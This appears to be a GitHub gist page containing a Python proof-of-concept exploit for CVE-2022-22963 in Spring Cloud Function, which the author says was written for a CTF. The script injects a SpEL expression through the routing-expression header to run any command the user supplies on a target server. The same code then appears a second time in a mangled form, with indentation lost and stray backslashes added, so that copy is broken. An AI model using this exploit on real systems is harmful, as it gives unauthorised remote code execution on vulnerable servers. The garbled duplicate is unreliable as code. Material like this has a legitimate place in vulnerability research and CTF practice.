bryanmcnulty/CVE-2022-22963.py

## CVE-2022-22963.py
#!/usr/bin/env python3

'''
 *  Written for a CTF :)
 *  ---
 *  Author:  Bryan McNulty
 *  Contact: bryanmcnulty@protonmail.com
 *  GitHub:  https://github.com/bryanmcnulty
 *  ---
 *  Dependencies:
 *    - argparse
 *    - requests
 *
 *  Proof-of-concept for CVE-2022-22963
 *  Affects Spring Cloud installations:
 *    - Up to (including) 3.1.6
 *    - From (including) 3.2.0 up to (including) 3.2.2
'''

import argparse
import requests

BANNER = '''
  ___ _   _  ___    ___  __  ___  ___    ___  ___  ___   ___  __
 / _/| \\ / || __|__(_  |/  \\(_  |(_  |__(_  |(_  |/ _ \\ / __||__`.
| \\__`\\ V /'| _||__|/ /| // |/ /  / /|__|/ /  / / \\__ /| ,_ \\ |_ |
 \\__/  \\_/  |___|  |___|\\__/|___||___|  |___||___| /_/  \\___/|__.'

Author:  Bryan McNulty
Contact: bryanmcnulty@protonmail.com
'''

def exploit(url, command):
	command = command.replace('\\', '\\\\').replace('"', '\\"')
	java_expression = 'T(java.lang.Runtime).getRuntime().exec("%s")' % command
	response = requests.post(
		url = '%s/functionRouter' % url,
		data = {'x': 'y'},
		headers = {
			'spring.cloud.function.routing-expression': java_expression
		}
	)
	if b'java.lang.ProcessImpl' in response.content:
		print('[+] Successfully created process')
	print('[*] Done')


def main():
	print(BANNER)

	parser = argparse.ArgumentParser(prog='CVE-2022-22963', description='Spring Cloud CVE-2022-22963 Exploit')
	parser.add_argument('url', help='Target base URL')
	parser.add_argument('command', help='Command to run')
	args = parser.parse_args()

	exploit(args.url.rstrip('/'), args.command)


if __name__ == '__main__':
	main()
	#!/usr/bin/env python3

	'''
	* Written for a CTF :)
	* ---
	* Author: Bryan McNulty
	* Contact: bryanmcnulty@protonmail.com
	* GitHub: https://github.com/bryanmcnulty
	* ---
	* Dependencies:
	* - argparse
	* - requests
	*
	* Proof-of-concept for CVE-2022-22963
	* Affects Spring Cloud installations:
	* - Up to (including) 3.1.6
	* - From (including) 3.2.0 up to (including) 3.2.2
	'''

	import argparse
	import requests

	BANNER = '''
	___ _ _ ___ ___ __ ___ ___ ___ ___ ___ ___ __
	/ _/\| \\ / \|\| __\|__(_ \|/ \\(_ \|(_ \|__(_ \|(_ \|/ _ \\ / __\|\|__`.
	\| \\__`\\ V /'\| _\|\|__\|/ /\| // \|/ / / /\|__\|/ / / / \\__ /\| ,_ \\ \|_ \|
	\\__/ \\_/ \|___\| \|___\|\\__/\|___\|\|___\| \|___\|\|___\| /_/ \\___/\|__.'

	Author: Bryan McNulty
	Contact: bryanmcnulty@protonmail.com
	'''

	def exploit(url, command):
	command = command.replace('\\', '\\\\').replace('"', '\\"')
	java_expression = 'T(java.lang.Runtime).getRuntime().exec("%s")' % command
	response = requests.post(
	url = '%s/functionRouter' % url,
	data = {'x': 'y'},
	headers = {
	'spring.cloud.function.routing-expression': java_expression
	}
	)
	if b'java.lang.ProcessImpl' in response.content:
	print('[+] Successfully created process')
	print('[*] Done')


	def main():
	print(BANNER)

	parser = argparse.ArgumentParser(prog='CVE-2022-22963', description='Spring Cloud CVE-2022-22963 Exploit')
	parser.add_argument('url', help='Target base URL')
	parser.add_argument('command', help='Command to run')
	args = parser.parse_args()

	exploit(args.url.rstrip('/'), args.command)


	if __name__ == '__main__':
	main()
No results found